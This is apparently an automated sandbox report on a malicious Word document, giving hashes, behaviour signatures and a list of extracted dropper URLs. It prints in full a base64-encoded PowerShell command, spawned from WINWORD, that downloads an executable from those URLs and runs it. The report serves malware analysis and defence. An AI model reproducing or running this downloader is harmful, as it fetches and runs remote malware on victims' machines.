Analysis

  • max time kernel
    137s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 18:03

General

  • Target

    6bcc38f2c505ae47eeef8458adac6108_JaffaCakes118.doc

  • Size

    151KB

  • MD5

    6bcc38f2c505ae47eeef8458adac6108

  • SHA1

    2261dc6140ceeac6b4520512de9ffe3e2175078d

  • SHA256

    9412268f1f2c0eb9a06cc682d774e05495a3b4e468749c77e157a5a354c2c8d8

  • SHA512

    53855cd1f39a5f7313de0ade1401de7a058ab4cf07382ef57f0f06b72cfbeb6996a9e139d03897e0477e980346556b21161d8fa21e2969ed767c4d6349526b1c

  • SSDEEP

    3072:J77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qP/fhJEQiAEoS5y3zgI0E2T5:J77HUUUUUUUUUUUUUUUUUUUT52VmfhCD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://pressuredspeech.com/dngn/cEmgNTByQ/

exe.dropper

https://phoneringtones.info/wp-content/uploads/qx93_k68trw3j-15334/

exe.dropper

http://safeservicesfze.com/wp-admin/ZmVYmAXv/

exe.dropper

https://freewallpaperdesktop.com/wp-includes/50lz_zkln03lbc-8209361/

exe.dropper

http://noingoaithatthanhnam.com/wp-admin/voytvHre/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6bcc38f2c505ae47eeef8458adac6108_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:800
  • C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
    powErSHell -e JABRADYAMgA1ADYANwAxADEAPQAnAFcAMQA3ADYANQAwAF8AJwA7ACQAcwA3ADUAXwA3ADkAIAA9ACAAJwA5ADUAOQAnADsAJAB3ADEAOQAyADYAOAAwAD0AJwBkADIANAAyADMAMwAnADsAJABuADgAMQBfADUANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcwA3ADUAXwA3ADkAKwAnAC4AZQB4AGUAJwA7ACQAbgA3ADIAOABfADIAPQAnAGkAOAA0ADMANwBfACcAOwAkAFAAMgAzADEAOQAzAD0ALgAoACcAbgBlACcAKwAnAHcAJwArACcALQBvAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAFcAYABFAGIAYwBgAEwAYABpAEUAYABOAHQAOwAkAEsAOAAzAF8AOAA3AD0AJwBoAHQAdABwADoALwAvAHAAcgBlAHMAcwB1AHIAZQBkAHMAcABlAGUAYwBoAC4AYwBvAG0ALwBkAG4AZwBuAC8AYwBFAG0AZwBOAFQAQgB5AFEALwBAAGgAdAB0AHAAcwA6AC8ALwBwAGgAbwBuAGUAcgBpAG4AZwB0AG8AbgBlAHMALgBpAG4AZgBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBxAHgAOQAzAF8AawA2ADgAdAByAHcAMwBqAC0AMQA1ADMAMwA0AC8AQABoAHQAdABwADoALwAvAHMAYQBmAGUAcwBlAHIAdgBpAGMAZQBzAGYAegBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBaAG0AVgBZAG0AQQBYAHYALwBAAGgAdAB0AHAAcwA6AC8ALwBmAHIAZQBlAHcAYQBsAGwAcABhAHAAZQByAGQAZQBzAGsAdABvAHAALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADUAMABsAHoAXwB6AGsAbABuADAAMwBsAGIAYwAtADgAMgAwADkAMwA2ADEALwBAAGgAdAB0AHAAOgAvAC8AbgBvAGkAbgBnAG8AYQBpAHQAaABhAHQAdABoAGEAbgBoAG4AYQBtAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB2AG8AeQB0AHYASAByAGUALwAnAC4AUwBQAEwASQBUACgAJwBAACcAKQA7ACQAdwA5ADMAOAAxAF8AOQA5AD0AJwBPADMAMQBfADQAMwAwADgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAMgA3ADAANwBfADQAIABpAG4AIAAkAEsAOAAzAF8AOAA3ACkAewB0AHIAeQB7ACQAUAAyADMAMQA5ADMALgBkAG8AVwBuAGwAbwBhAEQARgBpAGwARQAoACQAbAAyADcAMAA3AF8ANAAsACAAJABuADgAMQBfADUANwApADsAJAB3ADAAXwBfADkAXwBfAD0AJwB1ADYANwA2ADcAMgA2ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAbgA4ADEAXwA1ADcAKQAuAEwARQBuAGcAdABIACAALQBnAGUAIAAyADAANgA5ADcAKQAgAHsAJgAoACcASQBuACcAKwAnAHYAbwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAgACQAbgA4ADEAXwA1ADcAOwAkAHIAOQA1ADgAXwAwAD0AJwBoADUAMQA0ADAAOQAnADsAYgByAGUAYQBrADsAJABJADkANABfADEAMQAwADMAPQAnAGkAOQA2ADkAMAAzADEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAZgA3ADIAMQAxADAAMAA9ACcAWgA3ADcAMAAzADAAXwAnAA==
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3956

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\959.exe
    Filesize

    36KB

    MD5

    f147eaf95a416034767296eda3cedfdf

    SHA1

    be6747bb0cbdd8c052e73116a4cbb739d792db31

    SHA256

    a3f08ade304452b02116f2fd5894a2f8785f6066dfa470c3cd98a923bef2c772

    SHA512

    6092607d81ecc1619f55d9dee98aeedfbe9fd6de46097d97653d895e344019524628302c894f7e1224f014689589b3a4b2e25d784f38a8d0073dbd4728d7b2b3

  • C:\Users\Admin\AppData\Local\Temp\TCD9E3C.tmp\iso690.xsl
    Filesize

    263KB

    MD5

    ff0e07eff1333cdf9fc2523d323dd654

    SHA1

    77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

    SHA256

    3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

    SHA512

    b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m0kt25hj.yzm.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/800-7-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-585-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/800-4-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/800-6-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-8-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-1-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/800-36-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-11-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-12-0x00007FF7CF6E0000-0x00007FF7CF6F0000-memory.dmp
    Filesize

    64KB

  • memory/800-10-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-13-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-14-0x00007FF7CF6E0000-0x00007FF7CF6F0000-memory.dmp
    Filesize

    64KB

  • memory/800-28-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-29-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-589-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-5-0x00007FF811BAD000-0x00007FF811BAE000-memory.dmp
    Filesize

    4KB

  • memory/800-9-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-2-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/800-588-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/800-54-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-55-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-3-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/800-507-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-534-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-535-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-0-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/800-37-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/800-586-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/800-587-0x00007FF7D1B90000-0x00007FF7D1BA0000-memory.dmp
    Filesize

    64KB

  • memory/3956-564-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB

  • memory/3956-44-0x0000019356E80000-0x0000019356EA2000-memory.dmp
    Filesize

    136KB

  • memory/3956-38-0x00007FF811B10000-0x00007FF811D05000-memory.dmp
    Filesize

    2.0MB